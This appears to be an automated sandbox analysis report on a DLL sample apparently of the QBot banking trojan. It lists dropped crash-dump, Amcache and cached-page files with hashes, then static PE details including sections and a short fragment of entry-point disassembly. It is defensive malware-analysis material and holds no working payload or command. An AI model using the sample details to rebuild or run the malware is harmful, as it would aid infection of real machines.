SSDEEP:	192:Rrl7r3GLNiNF6nq6Y+rW6z5GgmfTTSRCprG89bH+sfMtm:RrlsNiP6q6Yj6cgmfTTSeH9fb
MD5:	CE8A351A6CE3B43851D7FEA217A57D38
SHA1:	41E34625391FFF5506BBE3E23502C9A70CA1B085
SHA-256:	642F091CB90EB38B282FCFADD84AB10967AF73F781681095A6C99E42ECEE5F58
SHA-512:	0E64EB19ABA6C8BC698084B00B4B411133810ABF773D60E80A63C259F2D9080E41FAAABEE8E06B20FFB7E525EED2CD3D48F53F468EDE808356AE5A3383399DA6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.4.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD6F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.448850272962248
Encrypted:	false
SSDEEP:	48:cvIwSD8zshJgtWI9OM//rWgc8sqYj6M8fm8M4JCdspFq+q8/MF4SrSid:uITfzE/agrsqYOxJINDWid
MD5:	35567EC53BBAC3112AB454B86C8A582F
SHA1:	F4A188D50942426AC0F318362FB95376D44E723A
SHA-256:	2EAFF2AC1939A3272BB868CE6AB03B5CD13EFE21D768DB558F5DE1E2C485A2C2
SHA-512:	6F6EC3B67D78B7B133D2F1E485D1CB81CDF008C9B7C7A008D67B2711CB7DF3733C0DCB2EF3644801D91694078C4D5C88D37804179DAFAE33956B0495376A66E0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2074343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD9E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.448988703772393
Encrypted:	false
SSDEEP:	48:cvIwSD8zshJgtWI9OM//rWgc8sqYj+8fm8M4JCdspFX+q8/M2Bq4SrSvd:uITfzE/agrsqYPJ9WqDWvd
MD5:	168F8CF55B81AAF58D263CD6CCB0C80C
SHA1:	C66D925BC1A68B1690D07E1228EB12F4C1AF5FF6
SHA-256:	0EA68CF4D448C2897C3BF20C0EA96D1C8B755BF149BF25104BA2B08035964423
SHA-512:	5EF0D0FBCEE48CD72CF49E93C9D211CD13F1408BB10AF1485CA5BDE266D2E9E504AA154425463862759AAABDD183A2F92D47374FFD06B5261A47E58C82ECA4F7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2074343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFEDF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jun 7 03:12:43 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	36850
Entropy (8bit):	2.3283087911714158
Encrypted:	false
SSDEEP:	192:uVO/LpZ53+c+/of+rBO5Skb5d3+CM2QoySNOGWsUoIjdfXC6:B/D+Qb5LbD3jMpvsRSXv
MD5:	42A7F45FCA9E6D29B7C97C9C20BC138E
SHA1:	99859C3611833794FC5AF570DDE8E535C47258AD
SHA-256:	E5C4BC65D84F5BED01CE071A89BEF44CA87A84584D494A887B190ACCA8393BDF
SHA-512:	7422A73EE90766E8A3A221D099033EB87F6927FF7D5EC93BDEB6C5604B34C3835E3910BD61E7C89F2BE1FB326A84602CE29CD014035E567CA9596F9E08FE547E
Malicious:	false
Preview:	MDMP....... ..........d............d...............l............)..........T.......8...........T................u...........................................................................................U...........B..............GenuineIntelW...........T..............d.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFFD9.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jun 7 03:12:44 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	37190
Entropy (8bit):	2.307754369406635
Encrypted:	false
SSDEEP:	192:JW7pZ53+c+oSrxO5SkbRS8+5v4tBwFKlfzX:ED+u5LbReF4nwFkz
MD5:	CF3F19575C5EB2CFB87A95EFE76A2A1F
SHA1:	645E00E98762578A8C06E52537F46E65C320BAFE
SHA-256:	D52557364C723FBE9A00BB7E5D173C48E428D9A81C2F5424F44161721CD3D4FD
SHA-512:	801D01A1A2BAB2C0BEABE908DD708AB76EDB24A3E36170F214578C689064CA2145A34BDCCB96990E0C3929CA20DBD005E3C0C7DA6FEBD28C8402CB27CE531F8B
Malicious:	false
Preview:	MDMP....... ..........d............d...............l............)..........T.......8...........T...............Fw...........................................................................................U...........B..............GenuineIntelW...........T.......$......d.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\national[1].htm

Download File

Process:	C:\Windows\SysWOW64\wermgr.exe
File Type:	HTML document, ASCII text, with very long lines (65212)
Category:	dropped
Size (bytes):	149673
Entropy (8bit):	5.2876644855030595
Encrypted:	false
SSDEEP:	3072:/DbDv9PpwZW+V6ssCcVwjhrTFJnZV12K5AZvBYEKdBW:zIAuW
MD5:	7EBE3B8C23361677A5D266FC33AD5CE0
SHA1:	95575823454420072615E512F96E6AE5061ACA35
SHA-256:	C7EDD3195D91EF7CD82A3041875BE1D314DFB5E5B58116D9FB8DAEAB3015E929
SHA-512:	83F660B73447B91B5EC02D0126739B24C831B7BEBF50FEC72AADA185CCC7068E30B1666B7D52CEE81120B75F2ABC9868E2C0470E5D92632F12FDE8981457C5C4
Malicious:	false
Preview:	<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><script>if (typeof window !== "undefined" && typeof window.process === "undefined") {. window.process = window.process \|\| { env: {} };. }</script><script type="env-config">{"clientId":"xfinity-learn-ui","sitecoreApiKey":"{1A57AE5E-AF7C-4A9E-803A-C756E3F23267}","sitecoreApiUrl":"https://jss.xfinity.com/","dictionaryKey":"{5FA0A82E-BBDB-4FBD-A3F4-9C5D07AA6E0E}","uniform":false,"oAuth":{"clientId":"shoplearn-web","endpoint":"https://oauth.xfinity.com"},"endpoints":{"ssmEnv":"https://api.sc.xfinity.com","aiQApiUrl":"https://aiq-prod.codebig2.net","errorRedirectUrl":"https://www.xfinity.com/learn/landing/sorry","cspApiUrl":"https://csp-prod.codebig2.net","dataLayerTimelineApiUrl":"https://bdl43tfhab.execute-api.us-east-1.amazonaws.com/prod/aiq-banner"},"environment":{"name":"PROD"},"appName":"xfinity-lea

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.293752371387758
Encrypted:	false
SSDEEP:	12288:9lXHZOAS8bjxhOO548jDlElApeyn0mmqmcKMmNgm2gCfRVIIEcIhTjg:vHZOAS8bjxhOO50iE
MD5:	0546D7FE15434690193A60E8C9064F80
SHA1:	8B1E91F8AFED3424C5A4F1A2178BD87D7D15772E
SHA-256:	FF5A19F6AA2812EBEA1461813B0E4FECBC34F4124C8B7D25BE4D93676AF17383
SHA-512:	A64C63E42D8CC2D0ED31580E12592D28F7D34AC7284D2C5226EABE8710D3A475211A6DB10163DE9A69BCCE2EF8E1AAE9FB1A9287A6D937DAD52F09312A1E1BFC
Malicious:	false
Preview:	regfj...j...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmr.X................................................................................................................................................................................................................................................................................................................................................."Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	3.824863906633808
Encrypted:	false
SSDEEP:	384:Mkc5Rftx1FPJ4JiwHFnql9OMIRCMYVCln:HqRftx1VJ4JDHF+9OqMY2
MD5:	A409660149639FF7B7F065C5EA43E064
SHA1:	C241B9809EB6AC76F209E41ED71CCF1CD6CB756A
SHA-256:	E97D3E316CDCE621AF4E1359B4A33510CC2F54082399E29ECD0CB058DE8C9C59
SHA-512:	92212D42E417D4C375226869A4D70CC6264709DFEE6E4ECB72443BE0835EA3184DACE4658261713195C36D0E2BF1E11140843B7AF107C6118083606E8BD14986
Malicious:	false
Preview:	regfi...i...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmr.X................................................................................................................................................................................................................................................................................................................................................."Q.HvLE.>......i.............J{...'x,.2.}...........0..............hbin................p.\..,..........nk,..;[........h........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..;[........ ........................... .......Z.......................Root........lf......Root....nk ..;[.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

C:\Windows\appcompat\Programs\Amcache.hve.tmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	1.8832207516435515
Encrypted:	false
SSDEEP:	48:5HVbvpYdASmiu3SS3eX5/cwlApldplCPjD04zISwL:5xpVNC0QALdLq/zIDL
MD5:	5721A16B45954133335079E5FDA2A067
SHA1:	D321C30477F5D115B4C7819C923A44AD1565D52F
SHA-256:	5CE0F10BF97388180A6DDB6B0FDAA24C9100D3E1616F9467E6982F97490FCA9B
SHA-512:	D507719E453DAFE6F51F1ED9736EA7CB4E866740B937DDAC53A52C1CDD36BAF73D70F7E9C6FFCC14C8344E3522648BAA9FCB3EBEA74082AA9A323CEE24250512
Malicious:	false
Preview:	regf........r.X.................... ...........C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...t.m.p.................-.............-...................-.rmtmr.X................................................................................................................................................................................................................................................................................................................................................1..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.tmp.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	1.918183874128478
Encrypted:	false
SSDEEP:	48:vHVbvLCGcpYdASmiu3SS3eX5/cwlApldplCPjD04zISwL:vVdcpVNC0QALdLq/zIDL
MD5:	D1595D3BB01C31B4361E86D8A2AD27B7
SHA1:	2F87B70952D5E37A59CCD52F5EF16A0746808813
SHA-256:	8041F9C599169ABD61C83DDD03FA9012A9AD56BC36CD8464321017012EF97439
SHA-512:	B113C9C6FD5F29096AF5D93383685DFF8FA90504BE45273D5AD0CDAC78A3A698A09023D0120A73FDA1CE3C7B94D32191460A8B5A67E14C713C1F95BD7EFD6822
Malicious:	false
Preview:	regf........r.X.................... ...........C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...t.m.p.................-.............-...................-.rmtmr.X................................................................................................................................................................................................................................................................................................................................................7..HvLE....................Q.......s..9..x........hbin................r.X............nk,.r.X........h...........0...........................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......sk..............(.................................................................................8......................1.?l.cL<.P...b....~z...........8......................1.?l.cL<.P...b....~z.............?...................?...................?........... ... ........... ...

Static File Info

General

File type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Entropy (8bit):	6.606178271521399
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	050_qbot.dll
File size:	742838
MD5:	bc4aed05e70290533ba126546e0989b0
SHA1:	c148fe036e3aa6a4dc5ce98b323cd8d76d978ac6
SHA256:	5ee244bbdd69f41b1df8e3736e09114603ee7d5e7520cae52424ed18642ca265
SHA512:	666c4642a277f7456de0e04432c693bdf65db5182bdcf91e56643b900b24ec2c6e71f66bdb02a69e8e7b530200890955c7cd4556ba257968a6c88c239f4b4735
SSDEEP:	12288:zDxy+2MIBYYimb3oG11xfTUUk0uU7/GQ4vbnWj68N:Pg+2MIBYkb4G11hTQ05bGM
TLSH:	A4F43B83A6826C92DBE61435CD9ED33667347A5C83F3DBB3F514A9E27D631A33944208
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^.WW.2..C......!.....L..........p........`.....j............>............ .......4........ ......................0..S..

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x6ad81470
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x6ad80000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp:	0x5757085E [Tue Jun 7 17:46:06 2016 UTC]
TLS Callbacks:	0x6adc4bf0, 0x6adc4ba0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1cba0e23b706e0bfbc0a4cb9b6bd80fb

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
sub esp, 1Ch
mov edx, dword ptr [esp+24h]
mov dword ptr [6ADF2030h], 00000000h
cmp edx, 01h
je 00007FA414C7A55Ch
mov ecx, dword ptr [esp+28h]
mov eax, dword ptr [esp+20h]
call 00007FA414C7A352h
add esp, 1Ch
retn 000Ch
lea esi, dword ptr [esi+00000000h]
mov dword ptr [esp+0Ch], edx
call 00007FA414CBE33Ch
mov edx, dword ptr [esp+0Ch]
jmp 00007FA414C7A519h
nop
push ebp
mov ebp, esp
push esi
push ebx
sub esp, 10h
mov ebx, dword ptr [6ADF4124h]
mov dword ptr [esp], 6ADC7000h
call ebx
mov esi, eax
sub esp, 04h
test esi, esi
mov eax, 00000000h
je 00007FA414C7A56Bh
mov dword ptr [esp], 6ADC7000h
call dword ptr [6ADF4144h]
sub esp, 04h
mov dword ptr [6ADF201Ch], eax
mov dword ptr [esp+04h], 6ADC7013h
mov dword ptr [esp], esi
call dword ptr [6ADF4128h]
sub esp, 08h
test eax, eax
je 00007FA414C7A553h
mov dword ptr [esp+04h], 6ADF2004h
mov dword ptr [esp], 6ADEC000h
call eax
mov eax, dword ptr [6ADC6020h]
test eax, eax
je 00007FA414C7A57Ah
mov dword ptr [esp], 6ADC7029h
call ebx
mov edx, 00000000h
sub esp, 04h
test eax, eax
je 00007FA414C7A558h
mov dword ptr [esp+04h], 00DC7037h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x73000	0xc53	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74000	0x5a4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8df10	0x1cc8	/55
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x77000	0x1790	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x76000	0x18	.tls
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x74108	0xcc	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x44ad4	0x44c00	False	0.4085191761363636	data	6.536085286601772	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x46000	0x24	0x200	False	0.068359375	data	0.444378072732298	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x47000	0x240c4	0x24200	False	0.042259137110726645	data	2.965728380228879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
/4	0x6c000	0x5954	0x5a00	False	0.266796875	data	4.8715558095609435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x72000	0x3e4	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x73000	0xc53	0xe00	False	0.41322544642857145	data	4.9102030514161354	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata	0x74000	0x5a4	0x600	False	0.42578125	data	4.85888040741761	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x75000	0x2c	0x200	False	0.0546875	data	0.2069200177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x76000	0x20	0x200	False	0.052734375	data	0.28655982431271465	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x77000	0x1790	0x1800	False	0.8084309895833334	data	6.600381492361927	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/14	0x79000	0x38	0x200	False	0.068359375	Matlab v4 mat-file (little endian) *, rows 2, columns 262144	0.23653878450968063	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/29	0x7a000	0xba4	0xc00	False	0.4329427083333333	data	5.509643399768958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/41	0x7b000	0x87	0x200	False	0.2265625	data	1.630440230936631	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
